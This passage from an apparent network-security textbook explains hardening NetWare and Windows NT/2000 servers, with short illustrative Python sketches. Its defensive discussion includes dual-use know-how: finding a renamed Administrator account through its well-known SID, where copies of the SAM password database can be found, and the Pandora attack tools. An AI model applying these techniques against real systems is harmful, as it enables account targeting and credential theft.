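    digest = hmac.new(SHARED_KEY, str(interval).encode(), hashlib.sha1)
    return digest.hexdigest()[:8]

challenge = os.urandom(16)
print(server_verify(challenge, token_response(challenge)))  # True
print("code for this interval:", one_time_code())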
Biometric Authentication Biometric authentication systems use measurable biological traits to identify and authenticate. Systems consist of some type of sensor, along with the software to identify match points: those areas of the data that are unique and specific to any given individual. By requiring multiple match points, biometric systems use overwhelming statistical proof to authenticate a user. Biometric authentication is grouped into two categories:

Static These systems capture characteristics that don't change over time. Examples include retinas, fingerprints, and facial features.

Dynamic These systems focus on biological behaviors as opposed to set characteristics. Examples include voice or handwriting patterns.

Methods and Sequences

A login method is an implemented login factor. A login sequence is one or more login methods in a specific sequence. Because of the variety of login methods and sequences, NMAS supports graded authentication, which controls access to network resources based on the login method used by a particular user. NMAS provides eight predefined groupings of methods and sequences, known as security clearance labels:

• Biometric, Password, and Token
• Biometric and Password
• Biometric and Token
• Password and Token
• Biometric
• Password
• Token
• Logged In (provides network access without using an NMAS method)

Administrators assign these labels to NetWare volumes. When a user has authenticated using NMAS, she is said to have a session clearance. If a user has the same clearance level as the label of a volume, she can access that volume (to the degree that she has NDS and file system rights to it). If a user has a lower clearance level than that applied to the volume, she has no access.

By providing authentication methods and sequences beyond a simple password, NMAS strengthens the access control already inherent in NetWare and gives an administrator a powerful and flexible platform for controlling access to resources.

Tweaking NetWare Security

Novell provides some security tweaks that allow you to enhance the security of your server even further. These include the SECURE.NCF script, as well as a number of console parameter settings.

The SECURE.NCF Script

NetWare includes a script called SECURE.NCF. When run during server startup, it automatically enables many of NetWare's security features, thus enhancing the security of the server. The SECURE.NCF script performs the following:

• Disables support for unencrypted passwords
• Disables the ability to access auditing functions using a general password
• Enables the ability to automatically repair bad volumes during startup
• Rejects bad NCP packets

All of these settings are required if you need to ensure that your system meets C2 trusted network specifications. If you are not required to meet C2 standards, you can comment out any setting that you do not wish to use.

Secure Console

When run from the server console, the Secure Console command provides the following security features:

• Allows the server to load software only from the SYS:SYSTEM directory
• Disables the console debugging utility
• Prevents the time and date from being changed by anyone but the console operator

Once the Secure Console command has been invoked, it cannot be disabled without rebooting the server. The Secure Console features are designed to help protect the server from attacks at the server console.

Tip To improve security even further, use the Lock Server Console option included with the Monitor utility.

Securing Remote Console Access

NetWare can be configured to allow you to remotely access the server console from any network workstation. Access is provided via the Rconsole utilities or any generic telnet program. There are a number of known security issues involved in enabling remote console access. The details of these vulnerabilities are described in the sections that follow.

Securing the Console Password

In NetWare versions 3.2 and earlier, the console password was included in the AUTOEXEC.NCF file in clear text. This meant that anyone who could gain read access to the file would be able to see the console password. The syntax used was

load remote secretpass

where secretpass is the password used to gain access to the server console. In NetWare versions 4.1x and higher, remote access can be administered from the Inetcfg utility. By selecting Manage Configuration > Configure Remote Access from the Inetcfg main menu, you can define your remote access parameters, including the remote console password.

The problem with Inetcfg is that it saves the password information in clear text to the file SYS:ETC\Netinfo.cfg. This is extremely bad: if you are running any of the IP services, such as Web or NFS, users are granted Read access to this directory. This means that any valid system user could potentially gain access to the server console. Clearly, some method of encrypting the console password is required. To encrypt the console password, issue the following commands from the server console:

load remote
remote encrypt

As shown in Figure 13.14, this will create the file SYS:SYSTEM\LDREMOTE.NCF, which contains an encrypted version of your password string. The -E switch tells the remote program that the password has been saved in an encrypted format.

You now have a number of options. You can

• Run the LDREMOTE.NCF file prior to running the INITSYS.NCF script within the AUTOEXEC.NCF file.
• Copy and paste the full command into your AUTOEXEC.NCF file.
• Copy and paste the -E switch, as well as the encrypted password, into the Remote Access Password field of the Inetcfg utility.
Figure 13.14: Encrypting the remote console password

Tip The choice is yours, but it is probably best to use the LDREMOTE.NCF script. This will save the encrypted password to the SYS:SYSTEM directory and keep Inetcfg from importing the commands.

Accessing the Console Using Telnet

Although NetWare allows you to use telnet to access the server console, this does not mean doing so is a good idea. The biggest problem with enabling telnet support on the server is that telnet sessions are not logged. Unlike an Rconsole connection, which generates an entry in the system log, telnet is capable of quietly connecting to the server without leaving a trace.

The other problem with using telnet is that authentication with the server uses clear text passwords. Even if you go to all the trouble of encrypting the console password, telnet transmits the password in clear text, so anyone with a packet sniffer may read it.

Warning The Inetcfg utility allows you to selectively enable Rconsole and/or telnet support. It is highly advised that you leave telnet support disabled.

The Pandora Factor

The most successful attack strategy against NetWare servers is known as Pandora. More an ongoing project and tool set than a coordinated attack, Pandora exploits weaknesses in NDS and NetWare Packet Signature in an attempt to gain access to the entire NDS system, not just a single server.

Note Like most hacker tools, Pandora is a very useful group of tools for legitimate administrators who want to test their own security, especially the strength of user passwords. Visit Pandora at www.nmrc.org/pandora/index.html.

Defense against Pandora includes some simple actions:

• Pandora only works effectively against passwords of up to 16 characters. Passwords of 17 characters or more are not affected by the current version of Pandora, so ensure that your admin password is at least 17 characters long.
• Some of the Pandora tools rely on access to the SYSTEM directory of a NetWare server. Verify that only admin has rights to this directory.
• Because Pandora uses sniffing, keeping all administrative workstations on a separate, switched segment will protect them from any sniffing attack.
• Configure all administrative workstations (and servers) to use NCP Packet Signature level 3, which requires every packet to be signed.

Summary

In this chapter we looked at how to secure a NetWare server environment. NetWare provides a fairly secure environment right out of the box, but there are always a few tweaks you can make to render your networking environment even more secure. To this end, we discussed account management, file access rights, and how to perform NDS audits. We even discussed why it is so important to secure the remote console password.

In the next chapter, we will take a look at Windows NT and how to secure an NT server environment.

Chapter 14: NT and Windows 2000

Windows NT Server has proven to be one of the most popular client-server platforms in existence. Windows 2000 is the next version of Microsoft's flagship operating system, and it includes some significant security improvements that, coupled with its ease of use and well-known heritage, provide a powerful (and complex) environment for enforcing security.

The default security posture of an NT server is pretty loose.
Windows 2000 is, in some ways, more secure in its default configuration, but it still includes some weaknesses. There are a number of procedures you can follow in order to increase security over the default configuration of both systems. We will start with a brief overview of the NT operating system and then jump right into how you can operate a more secure NT environment. We'll follow with a comparison between NT and 2000 and talk about 2000's unique security requirements.

NT Overview

The core operating system of NT Server is 32-bit. While this creates some backward-compatibility problems with 16-bit Windows applications, it helps to ensure that the OS kernel remains stable. NT is both multitasking and multithreaded, which helps to prevent any single process from monopolizing all available CPU time.

NT Server uses the same Win32 application programming interface as NT Workstation and Windows 95 and 98. This ensures a familiar programming environment that, in theory, allows a programmer to write a more stable application. For example, a programmer who is familiar with writing Windows Desktop applications will find programming for NT Server very similar, as both use the Win32 interface. This is in contrast to the NetWare Loadable Module (NLM) technology used by a NetWare server: a programmer writing code for a NetWare server must be specifically aware of the NLM programming environment.

Because the server uses the same Win32 interface as a Windows workstation, most Desktop applications are supported. This can be a real money saver for small environments that cannot afford to dedicate a system to server activities. Unlike NetWare, which requires you to dedicate a system as a server, NT Server can perform double duty as a user workstation as well. Server support for Win32 can also be a real time saver for the system administrator, because most of the tools that you are used to running from a desktop machine will run from the server, as well.

Note Unfortunately, NT is missing the remote control features of NetWare's Rconsole or UNIX's telnet (a telnet server is included with Windows 2000 Server). While there are tools available from Microsoft's Web site and from its Resource Kits to manage some server functions remotely, you cannot directly add or remove protocols, launch applications, or access the NT Server Desktop from a remote workstation. Third-party software is required to provide this functionality.

NT uses a database known as the Registry to save most of the system's configuration information. This can be information regarding user accounts, services, or even system device drivers. Related information is said to be stored under the same hive. For example, the hive HKEY_USERS is used to store information regarding user accounts. Within a hive, configuration information is organized into keys, and the individual fields that hold configuration data are known as values.

The benefit of the Registry is that information is stored in a central location, simplifying the process of finding and changing information. While most of NT's settings can be changed through the graphical interface, many settings must be changed manually in the Registry. The tool used for viewing and changing Registry information is known as regedt32.
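Hives and keys can also be read programmatically, which is handy when you want to audit a setting across many servers. Below is a minimal sketch using Python's winreg module; this is an assumption on my part (the module exists only on Windows, and is named _winreg in older Python releases). The value shown is the LSA Notification Packages entry revisited later in this chapter.

import winreg

# Open a key under the HKEY_LOCAL_MACHINE hive for read-only access.
key = winreg.OpenKey(
    winreg.HKEY_LOCAL_MACHINE,
    r"System\CurrentControlSet\Control\Lsa",
)
value, value_type = winreg.QueryValueEx(key, "Notification Packages")
print(value)  # with passfilt installed, this list includes PASSFILT
winreg.CloseKey(key)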
Out of the box, NT Server provides support for up to four processors. With hardware support, this can be increased to 32. The benefit of additional processors is that more CPU time can be made available to applications running on the server.

Virtual Memory

NT Server supports memory isolation of all applications running on the system. It also supports the use of virtual memory, which allows the server to utilize more memory space than is physically installed in the system. The benefit is that applications are free to use more memory to add features. The drawback is that virtual memory is stored on disk, which has an access time slower than physical memory by a factor of roughly 100.

It is important to understand that you take a performance hit once you start using a lot of virtual memory. It is true that you can follow Microsoft's minimum memory recommendations by installing 32MB of RAM in a server offering basic file, print, HTTP, WINS, and DHCP services. You may even get the system to boot up and function. Performance on this system would be absolutely dismal, however. For a system with this or a similar configuration, plan on installing at least 96MB-128MB of physical memory.

Warning Because the Registry contains a majority of the system's configuration information, you should be extremely careful when making changes. Never edit the Registry without first creating an emergency recovery disk, and never make changes without first understanding the effects of the change.

NT Domain Structure

NT Server uses Windows NT Directory Services for user and group management. This is not, as the name implies, a fully hierarchical directory service like NetWare's NDS. It is a flat security structure based upon the use of domains. Active Directory, the replacement for NT directory services in Windows 2000, remedies this problem by allowing a Windows environment to be managed in a hierarchical structure.

A domain is a group of workstations and servers associated by a single security policy. A user can perform a single logon and gain access to every server within the domain; there is no need to perform separate logons for each server.

Storing Domain Information

Domain information is stored on domain controllers. Each domain has a single Primary Domain Controller (PDC), which contains the master record of all domain information. Any other NT Server can be set up as a Backup Domain Controller (BDC). The BDC receives updates from the PDC, so there is a backup copy of the domain information. A user who logs in can authenticate with the PDC or any one of the BDCs.

This brings a bit of a server-centric dependency to the whole domain model. For example, if the PDC contains a logon script to connect users to network resources, a copy of this logon script must be provided on each BDC. If the logon script on the PDC is changed, the change must be synchronized with each of the BDC servers; the copy of the script on the BDC servers will not be updated automatically.

Tip Do not use the logon script to try to implement a portion of your security policy. All users have the ability to press Ctrl+C and break out of the logon script at any time.

Domain Trusts

To emulate a hierarchical structure, domains can be configured with trust relationships. When one domain trusts another, users of the trusted domain can be granted access to resources in the trusting domain. For example, suppose Domain A trusts Domain B.
Everyone who has domain user rights in Domain B (the trusted domain) can be permitted access to resources in Domain A (the trusting domain). However, since Domain B does not trust Domain A, users in Domain A have no access rights within Domain B. Trusts can be configured to be unidirectional (one domain trusts the other) or bi-directional (each domain trusts the other equally). A unidirectional trust is referred to as a one-way trust, and a bi-directional trust is referred to as a two-way trust.

While domain trusts are fine for a small environment, this model does not scale very well. For example, you cannot administer each domain from a single interface. You must systematically connect to each domain you wish to work with, one at a time. The other problem is, what if you have a few users who require access to multiple domains? With NetWare, you can simply create an alias object in each container where you wish the user to have access. With NT Server, this is not possible without creating multiple trust relationships, even if you only need to accommodate a small group of users.

Finally, you cannot check your trust relationships from a central location. You must go to each primary server in each domain to see what trust relationships have been set up. In a large environment, you may have to put pen to paper in order to fully document all of the trust relationships. This is in contrast to NetWare, where a simple scan of the NDS tree will identify who has access and where.

Designing a Trust Architecture

Trusts can be used to enhance security, but the number one rule is to keep it simple. Try to limit the number of trust relationships to only one or two. This will help to ensure that you do not create a web of trust relationships, and it will ease administration. So when should domain trusts be used? A good example is shown in Figure 14.1.

Figure 14.1: A network that is a domain trust candidate

This environment maintains a number of NT PDC and BDC servers. There are also a number of Lotus Notes servers, which are also running on Windows NT. This network is managed by two different support groups. One group is responsible for all Lotus Notes activity (databases, e-mail, and so on), while the other group is responsible for all other network functions.

The problem is that the general support group does not want the Notes group to have administrator access to the entire network. This is understandable: it would grant members of the Notes group access to areas of the network where they do not need to go. The Notes group members, however, claim they must be granted full administrator rights in order to do their jobs effectively; unless they have full administrator access to the Notes servers, they cannot properly manage the systems.

The solution is to make the two Notes servers the PDC and BDC of their own domain. This secondary domain can then be configured to trust the primary domain, as shown in Figure 14.2. The resulting trust relationship allows the Notes group to be granted administrator-level access to the two Notes servers without having administrator-level access to the rest of the network. It also allows administrators of the primary domain to retain their level of access in the secondary domain.

Figure 14.2: A trust relationship
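The Notes scenario boils down to one rule: access flows from the trusted domain into the trusting domain, and only in the direction the trust points. Here is a minimal sketch of that rule, with hypothetical domain names:

TRUSTS = {
    # trusting domain -> set of domains it trusts
    "NOTES": {"CORP"},  # the Notes domain trusts the primary domain
    "CORP": set(),      # the primary domain trusts no one
}

def may_access(user_domain, resource_domain):
    """A user can reach resources in her own domain, or in any
    domain that trusts her home domain."""
    if user_domain == resource_domain:
        return True
    return user_domain in TRUSTS.get(resource_domain, set())

print(may_access("CORP", "NOTES"))  # True: primary-domain admins keep access to the Notes servers
print(may_access("NOTES", "CORP"))  # False: the Notes group stays out of the rest of the network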
User Accounts

User accounts are managed with the User Manager for Domains utility, which can be accessed from the Administrative Tools program group. The User Manager for Domains utility is shown in Figure 14.3. This tool allows you to add and remove users, assign groups, and define account policies. All user access attributes are managed through this interface except for file, directory, and share permissions, which are set through Windows NT Explorer.

You can use the User Manager for Domains utility to manage both local and domain accounts. Every NT system, both server and workstation, has local accounts that must be managed outside of the domain. In order to manage local accounts from the NT system itself, you must disconnect from the domain and connect to each system. You can also remotely manage local accounts by selecting User > Select Domain from the User Manager for Domains utility and entering a system name instead of a domain name.

Figure 14.3: The User Manager for Domains utility

Tip Updating the local Administrator password on multiple NT systems can be quite a chore. Group23 has made a Perl script available for automating this task. The script can be found at www.emruz.com/g23/.

Working with SIDs

A Security Identifier, or SID, is a unique identification number that is assigned to every user and group. The format of a SID is as follows:

S-Revision Level-Identifier Authority-Subauthority

The initial S identifies this number as a SID. For a given domain, all values are identical for every user and group except for the final subauthority value (also called the relative identifier, or RID), which distinguishes between different users and groups. A number of subauthority values are referred to as well-known SIDs, because they are consistent in every NT domain. For example, the Administrator account always has a final subauthority value of 500. An attacker can use this information to help target certain accounts for attack.

Note Microsoft Knowledge Base document Q163846 lists all well-known SID numbers, along with their associated accounts.

Exploiting Well-Known SIDs

Microsoft, as well as many security consultants, recommends that you rename the NT Administrator account. The logic is that if an attacker does not know the logon name being used by the administrator, the attacker will not be able to compromise this account. A set of utilities written by Evgenii Rudnyi, however, shows just how easy it can be to circumvent this attempt at security through obscurity.

Figure 14.4 shows Rudnyi's two utilities in use. The first, user2sid, allows you to input a user or group name and produces the SID for that account. As mentioned, the SID is identical for every account except for the final subauthority value. With the second utility, sid2user, we can substitute the well-known value we wish to look up (such as 500 for the Administrator account). As shown in Figure 14.4, the Administrator account has been renamed to Admin_renamed. Through this quick check, we now know which account to target.

Figure 14.4: The user2sid and sid2user utilities

Note Rudnyi's SID utilities can be downloaded from www.ntbugtraq.com.

Tip Renaming the Administrator account provides little protection by itself. A better tactic is to ensure that the Administrator account uses a strong password and that all failed logon attempts are logged.
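The heart of the user2sid/sid2user trick is plain string handling. The sketch below parses textual SIDs and flags well-known final subauthority values; the real utilities call the Win32 account-lookup APIs, and the sample SID here is made up.

# Why renaming the Administrator account gains little: the final
# subauthority of the SID is well known, whatever the account is named.
WELL_KNOWN = {500: "Administrator", 501: "Guest", 512: "Domain Admins"}

def final_subauthority(sid):
    """Return the last subauthority of a textual SID, for example
    S-1-5-21-917267712-1342860078-1792151419-500 -> 500."""
    return int(sid.rsplit("-", 1)[1])

sid = "S-1-5-21-917267712-1342860078-1792151419-500"
print(WELL_KNOWN.get(final_subauthority(sid), "ordinary account"))  # Administrator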
The Security Account Manager

The Security Account Manager (SAM) is the database where all user account information is stored. This includes each user's logon name, SID, and an encrypted version of each password. The SAM is used by the Local Security Authority (LSA), which is responsible for managing system security. The LSA interfaces with the user and the SAM in order to identify what level of access should be granted.

The SAM is simply a file stored in the \WinNT\system32\config directory. Since the operating system always has this file open, it cannot be accessed by users. There are a number of other places where the SAM file can be located, however, that you need to monitor carefully:

\WinNT\repair This directory contains a backup version of the SAM file stored in compressed format. At a minimum, it will contain entries for the Administrator and Guest accounts.

Emergency repair disks When you create an emergency repair disk, a copy of the SAM is saved to floppy.

Backup tape An NT-aware backup program is capable of saving the SAM file.

If an attacker can get access to the SAM file from one of these three places, the attacker may be able to compromise the system.

Note In Chapter 16, we will look at how a brute force attack can be launched against the SAM file in order to recover account passwords.

Configuring User Manager Policies

NT provides a number of settings that allow you to define a user access policy. The settings are split across two utilities: account properties and user access rights are set through the User Manager for Domains utility, while Desktop restrictions are enforced through policies created with the System Policy Editor.

Account Policies

Account policies are set through User Manager by selecting Policies > Account. This produces the Account Policy window shown in Figure 14.5. The Account Policy window allows you to customize all settings that deal with system authentication. These settings are global, meaning that they affect all system users. A brief explanation of each option follows.

Figure 14.5: The Account Policy window

Maximum Password Age This setting determines the amount of time before a user is forced to change his password. Too long a period can be considered a security risk, while too brief a period may prompt a user to write down his password. Typically, a maximum password age of 30-90 days is considered acceptable.

Minimum Password Age This setting determines the amount of time that must pass before a user is allowed to change her password. When prompted to change their passwords, some users like to make repetitive password changes in order to cycle past the Password Uniqueness value. This allows the user to exceed the history setting and reset her password back to the current value. By setting a minimum password age, you can prevent users from immediately cycling back to the same password.
A value of three to seven days is usually sufficient to deter this user activity.

Minimum Password Length This setting determines the smallest acceptable password. Due to vulnerabilities in the LanMan password hash that we will discuss in Chapter 16, it is suggested that you use a minimum value of eight characters for passwords.

Password Uniqueness This setting allows you to configure how many previous passwords the system remembers for each user. This prevents a user from reusing an old password for the number of password changes recorded in this setting. Typically, you want to combine this setting with the Maximum Password Age value so that users will not use the same password more than once per year.

Account Lockout The Account Lockout setting defines how many logon attempts a user is allowed with an incorrect password before the account becomes administratively locked. This setting is used to prevent attackers from attempting to guess the password of a valid user account. Usually five or six attempts is a good balance between not giving an attacker too many tries at an account and giving the user a few attempts at getting his password right.

Reset Count After This setting defines the period of time in which a number of bad logons are considered to be part of the same logon attempt. For example, if Account Lockout is set to five attempts and Reset Count After is set to 30 minutes, the system will only lock the account if five failed logon attempts occur within a 30-minute period. After 30 minutes, the counter is reset and the next failed logon is counted as attempt number one. Depending on your environment, you may want to set this value as low as 30 minutes or as high as one day.

Lockout Duration If an account does become locked due to an excessive number of logon attempts, the Lockout Duration setting defines how long the account will remain locked. For high-security networks, you should set this value to Forever. This leaves the account locked until it is reset by the system administrator, allowing the administrator to investigate whether the lockout is due to an intruder or to a user who cannot remember her password.

For many environments, a lockout setting that re-enables the account after a specific period of time is sufficient. This is useful when a user locks her account and the administrator is not available to clear the lockout. It is also useful for preventing denial of service: an attacker could purposely attempt multiple logons with a bad password in order to lock out the legitimate user. By setting a duration, the account is able to clear itself without administrator intervention.
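The interaction among Account Lockout, Reset Count After, and Lockout Duration is easiest to see in code. Here is a minimal model using the example values above; times are in minutes, and the one-hour duration is an arbitrary assumption.

LOCKOUT_THRESHOLD = 5    # Account Lockout: failed attempts allowed
RESET_COUNT_AFTER = 30   # window in which failures accumulate
LOCKOUT_DURATION = 60    # how long a locked account stays locked

class Account:
    def __init__(self):
        self.failures = 0
        self.first_failure = None
        self.locked_until = None

    def failed_logon(self, now):
        """Record a failed logon at time `now` and report account state."""
        if self.locked_until is not None and now < self.locked_until:
            return "locked"
        # start a fresh count if the reset window has expired
        if self.first_failure is None or now - self.first_failure > RESET_COUNT_AFTER:
            self.failures = 0
            self.first_failure = now
        self.failures += 1
        if self.failures >= LOCKOUT_THRESHOLD:
            self.locked_until = now + LOCKOUT_DURATION
            return "locked"
        return "failed"

acct = Account()
print([acct.failed_logon(t) for t in (0, 1, 2, 3, 4)])
# five rapid failures lock the account on the fifth attempt

acct = Account()
print([acct.failed_logon(t) for t in (0, 40, 80, 120, 160)])
# the same failures spread past the reset window never trigger a lockout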
Forcibly Disconnect Remote Users When time restrictions are used, this setting will disconnect all users who do not log off when their time restriction expires. This is useful for ensuring that users do not remain logged on after business hours, thus giving an attacker an active account to work with.

Tip This setting is also useful for ensuring that all document files are closed so that a proper backup can be performed.

Users Must Log On in Order to Change Password In a Windows environment, users can change their passwords locally and then later update the server with these password changes. This setting means the user can only change his password during an authenticated session with the domain. It ensures that an attacker cannot use a local vulnerability in order to modify a password throughout an NT domain.

Increasing Password Security with passfilt.dll

With Service Pack 2 and later, Microsoft has included the passfilt.dll file. This file allows you to increase your password security by requiring each user's password to meet more stringent criteria. The passfilt.dll file performs the following checks:

• Passwords must be six characters or greater.
• Passwords must contain a mixture of uppercase, lowercase, numeric, and special characters (at least three of the four categories are required).
• Passwords cannot be a variation of your logon name or full username.

You can use Account Policies to require a longer password, but you cannot specify a shorter one. The domain administrator is able to override these settings on a user-by-user basis by managing the specific user with User Manager and setting a specific password in the password field. A password set this way is not subjected to passfilt.dll.

To implement passfilt.dll, edit the Registry value

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\Notification Packages

and add the character string PASSFILT. Do not delete the existing entries.
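The passfilt.dll criteria are straightforward to express in code. The sketch below approximates the three checks listed above; it is an illustration, not Microsoft's implementation, and the example names are hypothetical.

import string

def passes_filter(password, logon_name, full_name):
    """Approximation of the passfilt.dll checks described above."""
    if len(password) < 6:
        return False
    categories = [
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(c in string.punctuation for c in password),
    ]
    if sum(categories) < 3:  # at least three of the four categories
        return False
    lowered = password.lower()
    for name in (logon_name, full_name):
        if name and name.lower() in lowered:
            return False     # password may not contain the account name
    return True

print(passes_filter("Summer99!", "cbrenton", "Chris Brenton"))  # True
print(passes_filter("cbrenton1", "cbrenton", "Chris Brenton"))  # False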
User Rights

User rights are set through User Manager by selecting Policies > User Rights. This produces the User Rights Policy window shown in Figure 14.6. User rights allow users or groups to perform specific actions on the server. The right is selected from the Right drop-down menu, while the Grant To box identifies which users and groups have been granted this right. Checking Show Advanced User Rights causes the Right drop-down menu to display additional options. Some of the more important rights are described in the sections that follow.

Figure 14.6: The User Rights Policy window

Access This Computer from the Network This right defines which domain users are able to remotely authenticate with each of the servers within the domain. This right applies to all domain servers—not just one specific server, as the name implies.

Tip Instead of renaming the Administrator account, create a new account that is an administrator equivalent and use this account for managing the domain. This will allow you to remove the Access This Computer from the Network right from the Administrator account. The administrator will still be able to log on from the console, just not over the network. If you also log failed logon attempts, you will be able to see when someone is trying to break in to your domain as Administrator.

Backup Files and Directories This right supersedes all file permission settings and gives users who hold it read access to the entire file system.

Warning Backup Files and Directories is a dangerous right, because it gives the user access to the entire system without being flagged as an administrator equivalent. This right would allow a user to copy the SAM in order to run it through a password cracker.

Bypass Traverse Checking An advanced user right, Bypass Traverse Checking allows a user to navigate the file system regardless of the permission levels that have been set. File permissions are still enforced; however, the user is free to wander through the directory structure.

Log On Locally When managing a domain, this right defines who is allowed to log on from the PDC or BDC console. You may wish to limit console access to administrator-level accounts only. This can help to deter (but not completely prevent) physical attacks against the server. As with the Access This Computer from the Network right, you can use failed logon attempts to track whether any of your users have sneaked into the server room and attempted to access the server directly.

Manage Auditing and Security Logs If file and object auditing has been enabled, this right defines which users are allowed to review security logs and specify which files and objects will be audited.

Warning Be careful whom you grant this right to—an attacker can use it to cover his tracks once he has penetrated a system.

Policies and Profiles

Policies allow you to control the functionality of the user's workstation environment. This can include everything from hiding the Control Panel to disabling the ability to run programs that are not part of the Desktop. Policies can be set up globally for a domain, or they can be applied to specific users or groups.

Profiles allow you to customize the look and feel of a user's Desktop. You do this by authenticating to the domain using a special account and laying out the Desktop environment exactly the way you want it to appear to your end users. This can include special program groups or even a choice of color schemes and screen savers. There are a number of ways to implement profiles:

Mandatory profile Absolute enforcement of the Desktop environment. Mandatory profiles are loaded from the server and do not allow any customization. If the user changes her Desktop environment, it will be reset at her next logon.

Local profile A customizable profile that is stored on the local machine. If the user authenticates from a different workstation, his Desktop environment may appear different.

Network profile Also referred to as a roaming profile. Network profiles allow the user to receive her Desktop settings from any network workstation. Network profiles can be mandatory or customizable.

Policies are useful for deploying a security policy. For example, if your policy states that users are not allowed to load software programs onto the system, policies can remove the tools required to run the Setup program of a new software package. Profiles are more of a management tool, as they allow you to implement a standard Desktop.

Using Policies

Policies are created using the System Policy Editor, located in the Administrative Tools program group and shown in Figure 14.7. From the NT server, you can only create policies that will be applied to other NT systems. If you wish to create policies for Windows 95/98 systems, you must copy the Poledit.exe file from the WinNT directory to a Windows 95/98 machine and run the Policy Editor from the Windows 95/98 system.

Note The Policy Editor must be run on the operating system for which you wish to create a policy.

Figure 14.7: The System Policy Editor

The Policy Editor allows you to control the functionality of the user's workstation environment. This can be done by system, by user, or by groups of users.
The default settings for the Policy Editor allow you to create a policy that will be applied to all systems and all users. If you wish to create a more granular environment, you can use the Edit menu to define additional systems, groups, or users.

The policy in Figure 14.8 is made up of four groups:

• Domain Guests
• Domain Admins
• Domain Users
• Power Users

Figure 14.8: A sample policy

These groups allow you to customize the Desktop based on the level of access granted to each group member. For example, Domain Guests could have their Desktop environment stripped clean, while Domain Admins enjoy access to all Desktop functions. The Domain Users and Power Users groups could be permitted a level of Desktop functionality that falls in between Domain Guests and Domain Admins. This lets you define multiple levels of Desktop access.

Machine Policies

To configure machine policies, double-click the machine object you wish to manage. This will produce the Computer Properties window shown in Figure 14.9. By navigating the structure, you can enable policy settings that will be enforced either on all machines (if the default policy is modified) or on specific machines (if you select Edit > Add Computer). Some of the more useful machine policy settings you are allowed to configure are listed here.

Figure 14.9: The Computer Properties window for the default computer policy

Enable SNMP updates This setting allows the system to transmit SNMP updates to an SNMP management console.

Run This setting determines which programs should be run during system startup.

Sharing This setting determines whether administrative shares should be created.

Custom shared folders This setting determines whether shared program groups can be created on the system.

Logon Banner This setting defines a logon banner, which is useful for displaying corporate policies regarding system access.

Shutdown from Authentication Box This setting determines whether the Shutdown option is available from the logon authentication screen, which allows a user to shut down the system without first authenticating. The default is to have this option disabled; selecting this box enables the Shutdown option.

Do not display last logon name Selecting this option causes the last logon name not to be filled in. By default, Windows remembers the last user who performed a system logon and fills in the logon name field of the authentication window.

User and Group Policies

To configure user or group policies, double-click the object name that you wish to manage. This will produce the Properties window shown in Figure 14.10.
Figure 14.10: The Properties window for the default user policy

Some useful policy settings follow:

Remove Run command Prevents a user from selecting Start > Run from the Taskbar.

Remove folders from Settings Prevents a user from selecting Start > Settings in order to modify the system configuration.

Remove Find command Prevents a user from selecting Start > Find, which prevents the user from searching the local drives.

Hide drives in My Computer Prevents a user from browsing local or mapped drives using the My Computer icon.

Hide Network Neighborhood Prevents a user from browsing the network.

Disable Registry editing tools Prevents a user from modifying Registry keys.

Run only allowed Windows applications Allows the administrator to define which applications can be run by the user.

Enabling Policies

Once you have created your policy, enable it by saving the policy to the NETLOGON share, which is located in the \WinNT\System32\Repl\Import\Scripts directory. The policy must be copied to the NETLOGON share of every PDC and BDC.

To apply a policy to all NT systems, save the policy under the name Ntconfig.pol. If you created a policy that will be applied to Windows 95/98 users, save the policy using the name Config.pol and copy this file to the NETLOGON share, as well. When a Windows system authenticates with a domain, it looks for these specific files to see if a policy has been enforced: Windows NT systems look for the file Ntconfig.pol, while Windows 95/98 systems look for the file Config.pol.

File System

NT Server supports two file systems: FAT and the NT file system (NTFS). While both support long filenames, FAT is optimized for drives up to 500MB, while NTFS is designed for drives of 500MB and larger. NTFS is the preferred file system for storing applications and user files, because it supports file- and directory-level permissions while FAT does not.

Note Recovering deleted files is only supported under the FAT file system. NT provides no tools for recovering files remotely deleted from an NTFS drive.

Permissions

There are two types of permissions that can be associated with files and directories: share permissions and file permissions. Share permissions are enforced when users remotely attach to a shared file system. When a user attempts to access files through a share, the share permissions are checked to see if the user is allowed access.

File permissions are access rights that are assigned directly to the files and directories. Unlike share permissions, file permissions are enforced regardless of the method used to access the file system. This means that while a user would not be subjected to share permissions if he accessed the file system locally, he would still be challenged by the file-level permissions.

Note This distinction is important when you start setting permissions for services such as your Web server. Access permissions for a Web server are regulated only by file-level permissions; share permissions have no effect.

When accessing a share over the network, share and file permissions combine, and the user is subjected to the strictest level of access. For example, if a remote user has Full Control access set as a file permission but only has Read access to the share, that user will only be allowed Read access.
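This "most restrictive wins" rule is easy to express in code. Here is a minimal sketch using the four basic access levels discussed in the next section:

# Network access is limited by the more restrictive of the share
# permission and the file (NTFS) permission.
ORDER = ["No Access", "Read", "Change", "Full Control"]

def effective_access(share_perm, file_perm):
    """Remote users get the stricter of the two permission levels."""
    return min(share_perm, file_perm, key=ORDER.index)

print(effective_access("Read", "Full Control"))  # Read (the example above)
print(effective_access("Change", "Read"))        # Read

Remember that local access bypasses share permissions entirely, so in that case only the file permission applies.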
Share Permissions

Share permissions are set through Windows Explorer. Right-click the directory on which you wish to set share permissions and select the Sharing menu option. This produces the Shared Documents Properties window shown in Figure 14.11.

Figure 14.11: Sharing properties for the Shared Documents directory

Notice that there is also a tab marked Security. This is for setting file-level permissions, which we will discuss in the next section.

Selecting the Permissions button in the Shared Documents Properties window produces the Access Through Share Permissions window shown in Figure 14.12. Notice that the default is to give Everyone Full Control access to the share.

Tip Microsoft file sharing grants full access to everyone by default. You should make a habit of reviewing the share permission level and reducing the level of access whenever possible.

Figure 14.12: The Access Through Share Permissions window

Access levels are set by associating different groups or specific users with certain share permissions. This defines what level of access each user or group will have when attempting to access this specific share. Only four share permissions can be assigned:

No Access No access to the share is permitted.

Read The user or group may navigate the directory structure, view files, and execute programs.

Change The user or group has Read permissions and can add or delete files and directories. Permission is also granted to change existing files.

Full Control The user or group has Change permissions and can also set file permissions and take ownership of files and directories.

A more appropriate set of share permissions than the default is shown in Figure 14.13. In this configuration, Everyone has no access rights by default, because Everyone is not listed on the access control list. A user who is part of the Domain Users group is allowed Change-level access. Finally, Domain Admins are allowed Full Control of the share, which allows them to perform any required administrative functions.

Figure 14.13: Some suggested share permissions

Tip When modifying share permissions, always add permissions for the Domain Admins first. It is possible to configure a share so that the domain administrators have no access rights!

Once you have configured your share permissions, click OK to save your changes. Make a habit of checking these permission levels twice before leaving this screen. Share permissions take effect immediately and will affect any future users who try to access the share.

File Security

